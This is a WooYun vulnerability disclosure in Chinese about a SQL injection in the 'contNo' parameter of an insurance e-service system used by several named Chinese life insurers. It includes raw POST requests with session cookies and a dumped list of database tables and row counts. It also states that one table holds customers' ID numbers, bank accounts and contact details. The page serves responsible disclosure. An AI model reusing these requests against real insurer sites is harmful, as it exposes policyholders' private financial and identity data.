乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-04: 细节已通知厂商并且等待厂商处理中 2015-11-06: 厂商已经确认,细节仅向厂商公开 2015-11-09: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航) 2015-12-31: 细节向核心白帽子及相关领域专家公开 2016-01-10: 细节向普通白帽子公开 2016-01-20: 细节向实习白帽子公开 2015-12-17: 细节向公众公开
查看了下,影响众多大型人寿保险公司,涉及国华人寿、珠江人寿、君康人寿、国联人寿、中韩人寿等 其中不乏已经入驻的厂商。
漏洞位置:/eservice/cont/cont.do注入参数:contNo注:漏洞利用之前,需注册个普通会员账号,这个比较简单,就不多赘述。部分案例如下:
国华人寿**.**.**.**/eservice/account/register.action?action=initSingle珠江人寿**.**.**.**/eservice/account/register.action?action=initSingle君康人寿**.**.**.**/eservice/account/register.action?action=initSingle国联人寿**.**.**.**/eservice/eservice/account/register.action ?action=initSingle中韩人寿**.**.**.**/eservice/account/login.action ?action=initSingle
这里以珠江人寿为例:ps:测试可使用between.py脚本进行注册后,个人自助管理系统:
POST /eservice/cont/cont.do?action=querylinkedconts&ajax=true HTTP/1.1Host: **.**.**.**Proxy-Connection: keep-aliveContent-Length: 122Accept: application/xml, text/xml, */*Origin: http://**.**.**.**X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://**.**.**.**/eservice/user/customer.do?action=home&username=weaverAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=Pjp7W5xhc77gwGyh4HFTpnyTYnKDyQvKN1yLsRhtbkvgTLMtBrTG!-1026876428; __ghuid=51889761446607646641; prlife_point=A003e5fe40f2c1ab5b2b930f8e512761425ePjp7W5xhc77gwGyh4HFTpnyTYnKDyQvKN1yLsRhtbkvgTLMtBrTG!-1026876428!1446605242058; SERVERID=13d463a0bc3357450015f86147f4c89d|1446608135|1446605242contNo=dsad&coreStatus=02&startValidateDate=&endValidateDate=&_search=false&nd=1446607822114&rows=10&page=1&sidx=&sord=asc
大量数据:
Database: ESERVICE+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| BAK_T_ACCOUNT_VALUE_D_0819 | 5209544 || EBIZ_THIRD_TRADE | 4166435 || EBIZ_OPER_HIS | 3833769 || EBIZ_STATISTICS_HIS | 2822990 || EBIZ_BUSINESS_TRADE | 1651374 || EBIZ_STATISTICS_VISITOR | 827275 || EBIZ_APPNT | 724885 || EBIZ_INSURED | 724885 || EBIZ_ORDER | 724885 || EBIZ_ORDER_INSURANCE | 724884 || EBIZ_THIRD_ORDER | 716996 || EBIZ_ORDER_ACCOUNT | 613288 || ES_CUSTOMERCONT | 612623 || EBIZ_IMPART | 594505 || EBIZ_ELEC_CONT | 486094 || EBIZ_SMS_WAITQUEUE | 437507 || EBIZ_POINT_ACTION | 432670 || EBIZ_ORDER_REVISIT_DETAIL | 364710 || EBIZ_CORE_ESERVICE_IMPORT | 314547 || EBIZ_THIRD_NOTIFY | 177469 || EBIZ_ORDER_SURRENDER | 176693 || EBIZ_THIRD_SURRENDER | 175237 || BAK_T_ACCOUNT_VALUE_D_SNP_0819 | 135356 || EBIZ_PUBLIC_USER | 77550 || EBIZ_ORDER_REVISIT | 72942 || EBIZ_PUBLIC_MSG_EXCHANGE | 71660 || EBIZ_IMPART_ITEM | 37378 || EBIZ_THIRD_REFUND_PAYMENT | 31253 || EBIZ_LOGIN_CHECK | 17891 || EBIZ_PAYMENT | 6066 || EBIZ_PUBLIC_MESSAGE | 5666 || EBIZ_THIRD_FILE | 2948 || EBIZ_ACCOUNT_AUTH | 2748 || EBIZ_PRODUCT_PROPERTY | 2363 || EBIZ_MESSAGE_EXCHANGE | 1353 || EBIZ_CODE | 1279 || EBIZ_RECOMMEND_REWARD | 790 || EBIZ_PRODUCT_CHECKRULE | 577 || EBIZ_RECOMMENDED | 543 || EBIZ_APPOINTMENT_DETAIL | 303 || EBIZ_APPOINTMENT_INFO | 213 || EBIZ_POINT_HISTORY | 109 || EBIZ_GROUP_BILLNO | 100 || EBIZ_ORDER_TYPE_PROPERTY | 87 || EBIZ_COMPLAIN_SUGGEST | 70 || EBIZ_PRODUCT | 66 || EBIZ_MESSAGE_TEMPLATE | 56 || EBIZ_BATCH_INFO | 47 || EBIZ_ENSURE_LIABILITY | 32 || EBIZ_CLAIM_REPORT | 26 || EBIZ_JD_REFUND | 22 || EBIZ_CORE_SURRENDER | 21 || EBIZ_JKB_PAY_ORDER | 17 || EBIZ_PRODUCT_ENSURE | 16 || EBIZ_JKB_ACCOUNT | 15 || EBIZ_PUBLIC_MENU | 14 || EBIZ_PUBLIC_RECEIVE_CONFIG | 14 || EBIZ_RECOMMEND_PROMOTER | 13 || EBIZ_JKB_ORDER_CLAIM | 12 || EBIZ_JKB_REFUND | 11 || EBIZ_HOLIDAY_MONTH_COUNT | 4 || EBIZ_RECOMMEND_REWARD_RULE | 4 || EBIZ_JKB_PLATFORM | 1 || EBIZ_PUBLIC_PLATFORM | 1 || EBIZ_SMS_TIME | 1 |+--------------------------------+---------+
部分:
这个31W的 包含 身份证 保单号 银行账号 姓名 邮箱电话等等信息:部分:
等等再如:珠江人寿:
POST /eservice/cont/cont.do?action=querylinkedconts&ajax=true HTTP/1.1
POST /eservice/cont/cont.do?action=querylinkedconts&ajax=true HTTP/1.1Host: **.**.**.**Proxy-Connection: keep-aliveContent-Length: 126Accept: application/xml, text/xml, */*Origin: http://**.**.**.**X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://**.**.**.**/eservice/user/customer.do?action=homeAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=D69B254B36E1FDF3FBAEB75A3A4118DF; CNZZDATA1000419874=440329166-1445182109-null%7C1446605556; SERVERID=05abcb5b9ada6799e76378780182f867|1446606282|1446605536customerId=116410&contNo=aasd&startValidateDate=&endValidateDate=&_search=false&nd=1446606010538&rows=10&page=1&sidx=&sord=asc
等等其他如上!
如上所述!
参数过滤
危害等级:高
漏洞Rank:10
确认时间:2015-11-06 15:20
CNVD确认并复现所述情况,已经转由CNCERT向保险行业信息化主管部门通报,由其后续协调网站管理单位处置。
暂无